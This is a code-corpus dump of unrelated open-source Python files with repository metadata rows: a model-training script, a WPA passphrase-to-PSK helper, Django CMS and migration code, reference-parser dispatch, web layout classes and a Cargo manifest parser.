self.iface.__name__, self.name),
exc_info=(exc_type, exc_value, exc_tb))
six.reraise(exc_type, exc_value, exc_tb)
if self.result_contract is not None:
result = self._check_result_contract(ob, result)
return result
def getcallargs(self, *positional, **named):
"""Get the mapping of arguments to values."""
arg2value = {}
args = self.method.positional
num_pos = len(positional)
num_total = num_pos + len(named)
num_args = len(args)
for arg, value in zip(args, positional):
arg2value[arg] = value
defaults = self.method.optional
if 0 < num_args < num_pos:
raise TypeError('%s() takes %s %d %s (%d given)' % (
self.name, 'at most' if defaults else 'exactly', num_args,
'arguments' if num_args > 1 else 'argument', num_total))
elif num_args == 0 and num_total:
raise TypeError(
'%s() takes no arguments (%d given)' % (self.name, num_total))
for arg in args:
if isinstance(arg, str) and arg in named:
if arg in arg2value:
raise TypeError(
"%s() got multiple values for keyword "
"argument '%s'" % (self.name, arg))
else:
arg2value[arg] = named.pop(arg)
if defaults: # fill in any missing values with the defaults
for arg, value in defaults.items():
if arg not in arg2value:
arg2value[arg] = value
if named:
unexpected = next(iter(named))
raise TypeError(
"%s() got an unexpected keyword argument '%s'" %
(self.name, unexpected))
unassigned = num_args - len([arg for arg in args if arg in arg2value])
if unassigned:
num_required = num_args - len(defaults)
raise TypeError('%s() takes %s %d %s (%d given)' % (
self.name, 'at least' if defaults else 'exactly', num_required,
'arguments' if num_required > 1 else 'argument', num_total))
return arg2value
class AttributeDescriptor(object):
""" The AttributeDescriptor serves as a wrapper
for interface's attributes """
def __init__(self, attr):
self.attr = attr
self.name = attr.name
def __get__(self, instance, cls):
ob = instance.__context__
value = getattr(ob, self.name)
return self.attr.check_value(ob, value)
def __set__(self, instance, value):
ob = instance.__context__
self.attr.check_value(ob, value)
# extract original object
if isinstance(value, BoundInterfaceContract):
value = value.__context__
setattr(ob, self.name, value)
class BoundInterfaceContract(object):
def __init__(self, context, logger):
self.__context__ = context
self.__logger__ = logger
def __setattr__(self, name, value):
if name in self.__slots__:
super(BoundInterfaceContract, self).__setattr__(name, value)
else:
raise AttributeError(name)
def method_wrapper(element):
def func(self, *args, **kwargs):
return element(self.__context__, self.__logger__, *args, **kwargs)
return func
def construct_class(iface, elements):
attrs = {'__module__': iface.__module__}
slots = {'__context__', '__logger__'}
for name, element in elements.items():
slots.add(name)
if isinstance(element, AttributeContract):
attrs[name] = AttributeDescriptor(element)
else:
attrs[name] = method_wrapper(element)
name = '%sBoundContract' % iface.__name__
cls = type(name, (BoundInterfaceContract,), attrs)
cls.__slots__ = tuple(slots)
return implementer(iface)(cls)
| 31.541916 | 79 | 0.57608 | 9,394 | 0.891694 | 0 | 0 | 0 | 0 | 0 | 0 | 1,191 | 0.113052 |
908923bb1a1d3dddbedc40a59f1c9790842c688e | 3,979 | py | Python | hourglass/train.py | ziqi123/AutoParking | bc2c86fe93892c0502cc7cf689d8ec072d2974d1 | [
"Apache-2.0"
]
| null | null | null | hourglass/train.py | ziqi123/AutoParking | bc2c86fe93892c0502cc7cf689d8ec072d2974d1 | [
"Apache-2.0"
]
| null | null | null | hourglass/train.py | ziqi123/AutoParking | bc2c86fe93892c0502cc7cf689d8ec072d2974d1 | [
"Apache-2.0"
]
| null | null | null | import numpy as np
import torch
import torchvision.transforms as transforms
from dataloader.dataloader_hourglass import heatmap_Dataloader
import os
from network import KFSGNet
import torchvision.transforms as transforms
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
# Device configuration
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
num_epochs = 200
learning_rate = 0.001
transform = transforms.Compose([
transforms.ToTensor()])
params = dict()
params['data_normalize_factor'] = 256
params['dataset_dir'] = "./"
params['rgb2gray'] = False
params['dataset'] = "heatmap_dataset_all"
params['train_batch_sz'] = 16
params['val_batch_sz'] = 1
params['sigma'] = 3
dataloaders, dataset_sizes = heatmap_Dataloader(params)
train_loader = dataloaders['train']
test_loader = dataloaders['val']
# Define your model
model = KFSGNet()
# model.load_state_dict(torch.load(
# '/media/home_bak/ziqi/park/hourglass/10heatmap5.ckpt'))
# move model to the right device
model.to(device)
model.train()
# Loss and optimizer
loss_fn = torch.nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# Multi-step learning-rate decay:
# different epoch ranges can behave differently -- in some ranges the learning
# rate is updated, in others it is left unchanged.
# The milestones argument lists the epoch boundaries for the updates: inside
# [0, 200] the learning rate is not updated,
# while at the right edge of [200, 300], [300, 320], ..., [340, 400] it is
# updated once;
# the gamma argument is the factor the learning rate is multiplied by at each
# milestone (gamma=0.5 halves it).
# torch.optim.lr_scheduler.MultiStepLR(optimizer,
# milestones=[30, 60, 80, 100, 120, 140], gamma=0.5)
print(optimizer.state_dict()['param_groups'][0]['lr'])
# For updating learning rate
# Train the model
total_step = len(train_loader)
curr_lr = learning_rate
print("start")
def calculate_mask(heatmaps_targets):
    """
    :param heatmaps_targets: Variable (N,C,96,96) of target heatmaps
    :return: (mask, [N_idx, C_idx]) where mask is a Variable (N,C,96,96) with 1
             for every (sample, channel) whose target heatmap has a non-zero peak
    """
N, C, _, _ = heatmaps_targets.size()
N_idx = []
C_idx = []
for n in range(N):
for c in range(C):
max_v = heatmaps_targets[n, c, :, :].max().data
if max_v != 0.0:
N_idx.append(n)
C_idx.append(c)
mask = torch.zeros(heatmaps_targets.size())
mask[N_idx, C_idx, :, :] = 1.
mask = mask.float().cuda()
return mask, [N_idx, C_idx]
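# Illustrative call (hypothetical values): for a batch of 16 four-channel
# 96x96 target heatmaps,
#     mask, (n_idx, c_idx) = calculate_mask(torch.rand(16, 4, 96, 96).cuda())
# returns a (16, 4, 96, 96) mask that is 1 for every (sample, channel) whose
# target heatmap contains a non-zero peak, plus the indices of those entries.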
# def MSE(y_pred, gt):
# loss = 0
# loss += 0.5 * np.sum((y_pred - gt)**2)
# vec_gt = [[0]*3] * 5
# for w in range(4):
# vec_gt[w] = np.array([gt[w][0],
# gt[w][1]])
# vector_gt = vec_gt[1]-vec_gt[0]
# vec_pred = [[0]*3] * 5
# for v in range(4):
# vec_pred[w] = np.array([y_pred[w][0],
# y_pred[w][1]])
# vector_pred = vec_pred[1]-vec_pred[0]
# loss += (vector_gt[0]*vector_pred[1]-vector_pred[0]*vector_gt[1])**0.5
for epoch in range(num_epochs):
tmp = 0
for i, (data, gt, mask, item, imgPath, heatmaps_targets) in enumerate(train_loader):
# print(i)
data = data.to(device)
gt = gt.to(device)
mask = mask.to(device)
gt = gt.view(-1, 8)
heatmaps_targets = heatmaps_targets.to(device)
mask, indices_valid = calculate_mask(heatmaps_targets)
# print(heatmaps_targets.shape)
# Forward pass
outputs = model(data)
outputs = outputs * mask
heatmaps_targets = heatmaps_targets * mask
# print(outputs.shape)
loss = loss_fn(outputs, heatmaps_targets)
tmp += loss.item()
# exit()
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if i % 10 == 0:
print("Epoch [{}/{}], Step [{}/{}] Loss: {:.4f}, average_loss: {:.4f}, learning_rate: {}".format(
epoch + 1, num_epochs, i + 1, total_step, loss.item(), tmp / (i+1), optimizer.state_dict()['param_groups'][0]['lr']))
if (epoch + 1) % 10 == 0:
torch.save(model.state_dict(), '{}heatmap4.ckpt'.format(epoch + 1))
# card2 heatmap 26688
# card0 heatmap2 29009
| 27.631944 | 133 | 0.619754 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,853 | 0.442138 |
9089cafc79c7a1e8e0abc38c3cabc190f618f305 | 1,648 | py | Python | wpa-psk/wpa-psk.py | ranisalt/rsaur | 8b8e8f596a35e8aff53ccff0fc941deacdc885a4 | [
"MIT"
]
| null | null | null | wpa-psk/wpa-psk.py | ranisalt/rsaur | 8b8e8f596a35e8aff53ccff0fc941deacdc885a4 | [
"MIT"
]
| null | null | null | wpa-psk/wpa-psk.py | ranisalt/rsaur | 8b8e8f596a35e8aff53ccff0fc941deacdc885a4 | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import sys
from argparse import ArgumentParser
from getpass import getpass
from hashlib import pbkdf2_hmac
from signal import signal, SIGINT
def die(*_, **__):
sys.exit()
signal = signal(SIGINT, die)
iwd = """[Security]
PreSharedKey={psk}"""
supplicant = """network={{
ssid={ssid}
#psk={passphrase}
psk={psk}
}}"""
parser = ArgumentParser(
description="%(prog)s pre-computes PSK entries for network configuration blocks of wpa_supplicant or iwd config. An ASCII passphrase and SSID are used to generate a 256-bit PSK."
)
parser.add_argument("ssid", help="The SSID whose passphrase should be derived.")
parser.add_argument(
"passphrase",
help="The passphrase to use. If not included on the command line, passphrase will be read from standard input.",
nargs="?",
)
parser.add_argument(
"--iwd",
"-i",
dest="template",
action="store_const",
const=iwd,
default=supplicant,
help="Generate for iwd (default: generate for wpa_supplicant).",
)
args = parser.parse_args()
if not args.passphrase:
print("# reading passphrase from stdin", file=sys.stderr)
args.passphrase = getpass(prompt="")
if not 8 <= len(args.passphrase) <= 63:
print("Passphrase must be 8..63 characters", file=sys.stderr)
sys.exit(1)
passphrase = args.passphrase.encode()
if any(b < 32 or b == 127 for b in passphrase):
print("Invalid passphrase character", file=sys.stderr)
sys.exit(1)
ssid = args.ssid.encode()
psk = pbkdf2_hmac("sha1", passphrase, ssid, iterations=4096, dklen=32)
print(args.template.format(ssid=args.ssid, passphrase=args.passphrase, psk=psk.hex()))
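# --- Editor's illustrative usage (not part of the original script; values are made up) ---
# Saved as wpa-psk.py, the script would be invoked roughly like this:
#
#   $ python3 wpa-psk.py HomeNetwork "correct horse battery staple"
#   network={
#       ssid=HomeNetwork
#       #psk=correct horse battery staple
#       psk=<64 hex characters: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, dklen=32)>
#   }
#
# Passing --iwd/-i instead emits the two-line [Security] block for iwd.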
| 28.912281 | 182 | 0.703277 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 667 | 0.404733 |
908ab1d5d4950850ce0d224a0c7fe40fe59aa364 | 2,406 | py | Python | cms/management/commands/subcommands/copy_lang.py | mightyiam/django-cms | 09bf76d2f3d81fdaebcfb7e9ed4ecd4769fa8c25 | [
"BSD-3-Clause"
]
| 2 | 2018-05-17T02:49:49.000Z | 2019-08-20T02:07:44.000Z | cms/management/commands/subcommands/copy_lang.py | mightyiam/django-cms | 09bf76d2f3d81fdaebcfb7e9ed4ecd4769fa8c25 | [
"BSD-3-Clause"
]
| 2 | 2019-02-13T07:58:23.000Z | 2019-02-13T07:58:27.000Z | cms/management/commands/subcommands/copy_lang.py | mightyiam/django-cms | 09bf76d2f3d81fdaebcfb7e9ed4ecd4769fa8c25 | [
"BSD-3-Clause"
]
| null | null | null | # -*- coding: utf-8 -*-
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from cms.api import copy_plugins_to_language
from cms.models import Title, Page
from cms.utils.i18n import get_language_list
class CopyLangCommand(BaseCommand):
args = '<language_from language_to>'
help = u'duplicate the cms content from one lang to another (to boot a new lang) using draft pages'
def handle(self, *args, **kwargs):
verbose = 'verbose' in args
only_empty = 'force-copy' not in args
site = [arg.split("=")[1] for arg in args if arg.startswith("site")]
if site:
site = site.pop()
else:
site = settings.SITE_ID
#test both langs
try:
assert len(args) >= 2
from_lang = args[0]
to_lang = args[1]
assert from_lang != to_lang
except AssertionError:
raise CommandError("Error: bad arguments -- Usage: manage.py cms copy-lang <lang_from> <lang_to>")
try:
assert from_lang in get_language_list(site)
assert to_lang in get_language_list(site)
except AssertionError:
raise CommandError("Both languages have to be present in settings.LANGUAGES and settings.CMS_LANGUAGES")
for page in Page.objects.on_site(site).drafts():
# copy title
if from_lang in page.get_languages():
try:
title = page.get_title_obj(to_lang, fallback=False)
except Title.DoesNotExist:
title = page.get_title_obj(from_lang)
if verbose:
self.stdout.write('copying title %s from language %s\n' % (title.title, from_lang))
title.id = None
title.language = to_lang
title.save()
# copy plugins using API
if verbose:
self.stdout.write('copying plugins for %s from %s\n' % (page.get_page_title(from_lang), from_lang))
copy_plugins_to_language(page, from_lang, to_lang, only_empty)
else:
if verbose:
self.stdout.write('Skipping page %s, language %s not defined\n' % (page, from_lang))
self.stdout.write(u"all done")
| 37.59375 | 119 | 0.588944 | 2,119 | 0.880715 | 0 | 0 | 0 | 0 | 0 | 0 | 515 | 0.214048 |
908b0f1eabec4449e380288689a4979deb9e601d | 424 | py | Python | easyml/mainsite/migrations/0015_auto_20181014_1837.py | evancasey1/EasyML | 69f0c246cb7e1d6f7167eb504c30693088e703fd | [
"MIT"
]
| null | null | null | easyml/mainsite/migrations/0015_auto_20181014_1837.py | evancasey1/EasyML | 69f0c246cb7e1d6f7167eb504c30693088e703fd | [
"MIT"
]
| null | null | null | easyml/mainsite/migrations/0015_auto_20181014_1837.py | evancasey1/EasyML | 69f0c246cb7e1d6f7167eb504c30693088e703fd | [
"MIT"
]
| 1 | 2020-10-25T08:14:33.000Z | 2020-10-25T08:14:33.000Z | # Generated by Django 2.1.2 on 2018-10-14 18:37
from django.db import migrations
import picklefield.fields
class Migration(migrations.Migration):
dependencies = [
('mainsite', '0014_mlmodel_type_num'),
]
operations = [
migrations.AlterField(
model_name='mlmodel',
name='data',
field=picklefield.fields.PickledObjectField(editable=False),
),
]
| 21.2 | 72 | 0.629717 | 313 | 0.738208 | 0 | 0 | 0 | 0 | 0 | 0 | 95 | 0.224057 |
908bf756c481540c4c44d86144640fa2370be038 | 1,563 | py | Python | adsrefpipe/refparsers/handler.py | golnazads/ADSReferencePipeline | 802f26a9e085e6ff5de43f3b5642b2d9fad52cbb | [
"MIT"
]
| null | null | null | adsrefpipe/refparsers/handler.py | golnazads/ADSReferencePipeline | 802f26a9e085e6ff5de43f3b5642b2d9fad52cbb | [
"MIT"
]
| null | null | null | adsrefpipe/refparsers/handler.py | golnazads/ADSReferencePipeline | 802f26a9e085e6ff5de43f3b5642b2d9fad52cbb | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
from adsrefpipe.refparsers.CrossRefXML import CrossReftoREFs
from adsrefpipe.refparsers.ElsevierXML import ELSEVIERtoREFs
from adsrefpipe.refparsers.JATSxml import JATStoREFs
from adsrefpipe.refparsers.IOPxml import IOPtoREFs
from adsrefpipe.refparsers.SpringerXML import SPRINGERtoREFs
from adsrefpipe.refparsers.APSxml import APStoREFs
from adsrefpipe.refparsers.NatureXML import NATUREtoREFs
from adsrefpipe.refparsers.AIPxml import AIPtoREFs
from adsrefpipe.refparsers.WileyXML import WILEYtoREFs
from adsrefpipe.refparsers.NLM3xml import NLMtoREFs
from adsrefpipe.refparsers.AGUxml import AGUtoREFs
from adsrefpipe.refparsers.arXivTXT import ARXIVtoREFs
def verify(parser_name):
"""
:param parser_name: parser name from db
    :return: the toREFs parser class matching ``parser_name``, or None if the name is not recognized
    """
    # based on the parser name, return the matching parser class (most are XML reference formats)
if parser_name == 'CrossRef':
return CrossReftoREFs
if parser_name == 'ELSEVIER':
return ELSEVIERtoREFs
if parser_name == 'JATS':
return JATStoREFs
if parser_name == 'IOP':
return IOPtoREFs
if parser_name == 'SPRINGER':
return SPRINGERtoREFs
if parser_name == 'APS':
return APStoREFs
if parser_name == 'NATURE':
return NATUREtoREFs
if parser_name == 'AIP':
return AIPtoREFs
if parser_name == 'WILEY':
return WILEYtoREFs
if parser_name == 'NLM':
return NLMtoREFs
if parser_name == 'AGU':
return AGUtoREFs
if parser_name == 'arXiv':
return ARXIVtoREFs
return None
| 32.5625 | 67 | 0.723608 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 238 | 0.152271 |
908cafca02ccd9dbc79045504cbba8cbd1494065 | 12,221 | py | Python | src/onegov/translator_directory/layout.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
]
| null | null | null | src/onegov/translator_directory/layout.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
]
| null | null | null | src/onegov/translator_directory/layout.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
]
| null | null | null | from cached_property import cached_property
from purl import URL
from onegov.translator_directory import _
from onegov.core.elements import Block, Link, LinkGroup, Confirm, Intercooler
from onegov.core.utils import linkify
from onegov.org.layout import DefaultLayout as BaseLayout
from onegov.translator_directory.collections.documents import \
TranslatorDocumentCollection
from onegov.translator_directory.collections.language import LanguageCollection
from onegov.translator_directory.collections.translator import \
TranslatorCollection
from onegov.translator_directory.constants import member_can_see, \
editor_can_see, GENDERS, ADMISSIONS, PROFESSIONAL_GUILDS, \
INTERPRETING_TYPES
class DefaultLayout(BaseLayout):
@staticmethod
def linkify(text):
return linkify(text)
@staticmethod
def format_languages(languages):
return ', '.join(sorted((lang.name for lang in languages or [])))
def format_gender(self, gender):
return self.request.translate(GENDERS[gender])
@staticmethod
def format_drive_distance(number):
if not number:
return ''
return f'{number} km'
def format_boolean(self, val):
assert isinstance(val, bool)
return self.request.translate((_('Yes') if val else _('No')))
def format_admission(self, val):
return self.request.translate(ADMISSIONS[val])
def show(self, attribute_name):
"""Some attributes on the translator are hidden for less privileged
users"""
if self.request.is_member:
return attribute_name in member_can_see
if self.request.is_editor:
return attribute_name in editor_can_see
return True
def color_class(self, count):
""" Depending how rare a language is offered by translators,
apply a color code using the returned css class
"""
if count <= 5:
return 'text-orange'
def format_prof_guild(self, key):
return self.request.translate(PROFESSIONAL_GUILDS[key])
def format_interpreting_type(self, key):
return self.request.translate(INTERPRETING_TYPES[key])
class TranslatorLayout(DefaultLayout):
@cached_property
def file_collection(self):
return TranslatorDocumentCollection(
self.request.session,
translator_id=self.model.id,
category=None
)
@cached_property
def editbar_links(self):
if self.request.is_admin:
return [
LinkGroup(
title=_('Add'),
links=(
Link(
text=_("Add translator"),
url=self.request.class_link(
TranslatorCollection, name='new'
),
attrs={'class': 'new-person'}
),
)
),
Link(
text=_("Edit"),
url=self.request.link(
self.model, name='edit'
),
attrs={'class': 'edit-link'}
),
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Confirm(
_("Do you really want to delete "
"this translator?"),
_("This cannot be undone."),
_("Delete translator"),
_("Cancel")
),
Intercooler(
request_method='DELETE',
redirect_after=self.request.class_link(
TranslatorCollection
)
)
)
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
),
Link(
_('Documents'),
self.request.link(self.file_collection),
attrs={'class': 'documents'}
),
]
elif self.request.is_editor:
return [
Link(
text=_("Edit"),
url=self.request.link(
self.model, name='edit-restricted'
),
attrs={'class': 'edit-link'}
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
),
]
elif self.request.is_member:
return [
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
),
Link(text=self.model.title)
]
return links
class EditTranslatorLayout(TranslatorLayout):
@cached_property
def title(self):
return _('Edit translator')
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Edit')))
return links
class TranslatorCollectionLayout(DefaultLayout):
@cached_property
def title(self):
return _('Search for translators')
@cached_property
def breadcrumbs(self):
return super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
)
]
@cached_property
def editbar_links(self):
if self.request.is_admin:
return [
LinkGroup(
_('Add'),
links=(
Link(
text=_("Add translator"),
url=self.request.class_link(
TranslatorCollection, name='new'
),
attrs={'class': 'new-person'}
),
Link(
text=_("Add language"),
url=self.request.class_link(
LanguageCollection, name='new'
),
attrs={'class': 'new-language'}
)
)
),
Link(
_('Export Excel'),
url=self.request.class_link(
TranslatorCollection, name='export'
),
attrs={'class': 'export-link'}
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
elif self.request.is_editor or self.request.is_member:
return [
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
class AddTranslatorLayout(TranslatorCollectionLayout):
@cached_property
def title(self):
return _('Add translator')
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Add')))
return links
@property
def editbar_links(self):
return []
class TranslatorDocumentsLayout(DefaultLayout):
@cached_property
def breadcrumbs(self):
return super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
),
Link(
text=self.model.translator.title,
url=self.request.link(self.model.translator)
),
Link(text=_('Documents'))
]
@cached_property
def upload_url(self):
url = URL(self.request.link(self.model, name='upload'))
url = url.query_param('category', self.model.category)
return self.csrf_protected_url(url.as_string())
def link_for(self, category):
return self.request.class_link(
self.model.__class__,
{'translator_id': self.model.translator_id, 'category': category}
)
class LanguageCollectionLayout(DefaultLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Languages')))
return links
@property
def editbar_links(self):
return [LinkGroup(
_('Add'),
links=(
Link(
text=_("Add language"),
url=self.request.class_link(
LanguageCollection, name='new'
),
attrs={'class': 'new-language'}
),
)
)] if self.request.is_admin else []
class LanguageLayout(DefaultLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(
Link(_('Languages'),
url=self.request.class_link(LanguageCollection))
)
return links
class EditLanguageLayout(LanguageLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(self.model.name))
links.append(Link(_('Edit')))
return links
@cached_property
def editbar_links(self):
if self.request.is_admin:
if not self.model.deletable:
return [
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Block(
_("This language is used and can't be "
"deleted."),
no=_("Cancel")
),
)
),
]
return [
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Confirm(
_("Do you really want to delete "
"this language?"),
_("This cannot be undone."),
_("Delete language"),
_("Cancel")
),
Intercooler(
request_method='DELETE',
redirect_after=self.request.class_link(
TranslatorCollection
)
)
)
),
]
return []
class AddLanguageLayout(LanguageLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Add')))
return links
@property
def editbar_links(self):
return []
| 31.17602 | 79 | 0.469274 | 11,487 | 0.939939 | 0 | 0 | 9,633 | 0.788233 | 0 | 0 | 1,356 | 0.110957 |
908cc9c6b5ff8ca35a1dc06753afe50c50104b9d | 1,169 | py | Python | src/dsanalizer/informations.py | perqu/Dataset-Analizer | c12ca74bd4f1e5969f0d90d6115a87ff3afd7f59 | [
"MIT"
]
| null | null | null | src/dsanalizer/informations.py | perqu/Dataset-Analizer | c12ca74bd4f1e5969f0d90d6115a87ff3afd7f59 | [
"MIT"
]
| null | null | null | src/dsanalizer/informations.py | perqu/Dataset-Analizer | c12ca74bd4f1e5969f0d90d6115a87ff3afd7f59 | [
"MIT"
]
| null | null | null | import pandas as pd
import numpy as np
import io
def info(df):
print("------------DIMENSIONS------------")
print("Rows:", df.shape[0])
print("Columns:", df.shape[1])
print("--------------DTYPES--------------")
columns = df.columns.tolist()
integers = df.select_dtypes("integer").columns.tolist()
floats = df.select_dtypes("float").columns.tolist()
bools = df.select_dtypes("bool").columns.tolist()
objects = df.select_dtypes("object").columns.tolist()
dataType = []
for el in columns:
if el in integers:
dataType.append('int')
if el in floats:
dataType.append('float')
if el in bools:
dataType.append('bool')
if el in objects:
dataType.append('object')
d = {'Column' : columns, 'Type': dataType}
print(pd.DataFrame(d))
print("----------MISSING VALUES----------")
print("Is any value missing? ", np.where(df.isnull().values.any() == False, "No", "Yes"), "\n")
    buf = io.StringIO()
    df.info(buf=buf)
    mem_usage = buf.getvalue().split('\n')[-2].split(":")[1].strip()
    print("----------MEMORY USAGE------------ \n", mem_usage) | 33.4 | 100 | 0.544055 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 278 | 0.23781 |
908ec7d6f30da870417cfcc9194599857d219fff | 5,861 | py | Python | src/packagedcode/cargo.py | Siddhant-K-code/scancode-toolkit | d1e725d3603a8f96c25f7e3f7595c68999b92a67 | [
"Apache-2.0",
"CC-BY-4.0"
]
| 1,511 | 2015-07-01T15:29:03.000Z | 2022-03-30T13:40:05.000Z | src/packagedcode/cargo.py | Siddhant-K-code/scancode-toolkit | d1e725d3603a8f96c25f7e3f7595c68999b92a67 | [
"Apache-2.0",
"CC-BY-4.0"
]
| 2,695 | 2015-07-01T16:01:35.000Z | 2022-03-31T19:17:44.000Z | src/packagedcode/cargo.py | Siddhant-K-code/scancode-toolkit | d1e725d3603a8f96c25f7e3f7595c68999b92a67 | [
"Apache-2.0",
"CC-BY-4.0"
]
| 540 | 2015-07-01T15:08:19.000Z | 2022-03-31T12:13:11.000Z |
# Copyright (c) nexB Inc. and others. All rights reserved.
# ScanCode is a trademark of nexB Inc.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/scancode-toolkit for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import logging
import re
import attr
from packageurl import PackageURL
import toml
from commoncode import filetype
from commoncode import fileutils
from packagedcode import models
"""
Handle Rust cargo crates
"""
TRACE = False
logger = logging.getLogger(__name__)
if TRACE:
import sys
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
@attr.s()
class RustCargoCrate(models.Package):
default_type = 'cargo'
default_primary_language = 'Rust'
default_web_baseurl = 'https://crates.io'
default_download_baseurl = 'https://crates.io/api/v1'
default_api_baseurl = 'https://crates.io/api/v1'
@classmethod
def get_package_root(cls, manifest_resource, codebase):
return manifest_resource.parent(codebase)
def repository_homepage_url(self, baseurl=default_web_baseurl):
if self.name:
return '{}/crates/{}'.format(baseurl, self.name)
def repository_download_url(self, baseurl=default_download_baseurl):
if self.name and self.version:
return '{}/crates/{}/{}/download'.format(baseurl, self.name, self.version)
def api_data_url(self, baseurl=default_api_baseurl):
if self.name:
return '{}/crates/{}'.format(baseurl, self.name)
@attr.s()
class CargoToml(RustCargoCrate, models.PackageManifest):
file_patterns = ('Cargo.toml',)
extensions = ('.toml',)
@classmethod
def is_manifest(cls, location):
"""
Return True if the file at ``location`` is likely a manifest of this type.
"""
return filetype.is_file(location) and fileutils.file_name(location).lower() == 'cargo.toml'
@classmethod
def recognize(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
package_data = toml.load(location, _dict=dict)
core_package_data = package_data.get('package', {})
name = core_package_data.get('name')
version = core_package_data.get('version')
description = core_package_data.get('description')
if description:
description = description.strip()
authors = core_package_data.get('authors')
parties = list(party_mapper(authors, party_role='author'))
declared_license = core_package_data.get('license')
package = cls(
name=name,
version=version,
description=description,
parties=parties,
declared_license=declared_license
)
yield package
@attr.s()
class CargoLock(RustCargoCrate, models.PackageManifest):
file_patterns = ('Cargo.lock',)
extensions = ('.lock',)
@classmethod
def is_manifest(cls, location):
"""
Return True if the file at ``location`` is likely a manifest of this type.
"""
return (filetype.is_file(location)
and fileutils.file_name(location).lower() == 'cargo.lock')
@classmethod
def recognize(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
package_data = toml.load(location, _dict=dict)
package_dependencies = []
core_package_data = package_data.get('package', [])
for dep in core_package_data:
package_dependencies.append(
models.DependentPackage(
purl=PackageURL(
type='crates',
name=dep.get('name'),
version=dep.get('version')
).to_string(),
requirement=dep.get('version'),
scope='dependency',
is_runtime=True,
is_optional=False,
is_resolved=True,
)
)
yield cls(dependencies=package_dependencies)
def party_mapper(party, party_role):
"""
Yields a Party object with party of `party_role`.
https://doc.rust-lang.org/cargo/reference/manifest.html#the-authors-field-optional
"""
for person in party:
name, email = parse_person(person)
yield models.Party(
type=models.party_person,
name=name,
role=party_role,
email=email)
def parse_person(person):
"""
https://doc.rust-lang.org/cargo/reference/manifest.html#the-authors-field-optional
A "person" is an object with an optional "name" or "email" field.
A person can be in the form:
"author": "Isaac Z. Schlueter <[email protected]>"
For example:
>>> p = parse_person('Barney Rubble <[email protected]>')
>>> assert p == ('Barney Rubble', '[email protected]')
>>> p = parse_person('Barney Rubble')
>>> assert p == ('Barney Rubble', None)
>>> p = parse_person('<[email protected]>')
>>> assert p == (None, '[email protected]')
"""
parsed = person_parser(person)
if not parsed:
name = None
parsed = person_parser_no_name(person)
else:
name = parsed.group('name')
email = parsed.group('email')
if name:
name = name.strip()
if email:
email = email.strip('<> ')
return name, email
person_parser = re.compile(
r'^(?P<name>[^\(<]+)'
r'\s?'
r'(?P<email><([^>]+)>)?'
).match
person_parser_no_name = re.compile(
r'(?P<email><([^>]+)>)?'
).match
| 28.590244 | 99 | 0.61696 | 3,604 | 0.614912 | 2,304 | 0.393107 | 3,634 | 0.620031 | 0 | 0 | 1,992 | 0.339874 |
90918aea55bbacc028653f4732ff48d1cf1a76ea | 10,268 | py | Python | tests/testing/units.py | mandaltj/gem5_chips | b9c0c602241ffda7851c1afb32fa01f295bb98fd | [
"BSD-3-Clause"
]
| 135 | 2016-10-21T03:31:49.000Z | 2022-03-25T01:22:20.000Z | tests/testing/units.py | mandaltj/gem5_chips | b9c0c602241ffda7851c1afb32fa01f295bb98fd | [
"BSD-3-Clause"
]
| 35 | 2017-03-10T17:57:46.000Z | 2022-02-18T17:34:16.000Z | tests/testing/units.py | mandaltj/gem5_chips | b9c0c602241ffda7851c1afb32fa01f295bb98fd | [
"BSD-3-Clause"
]
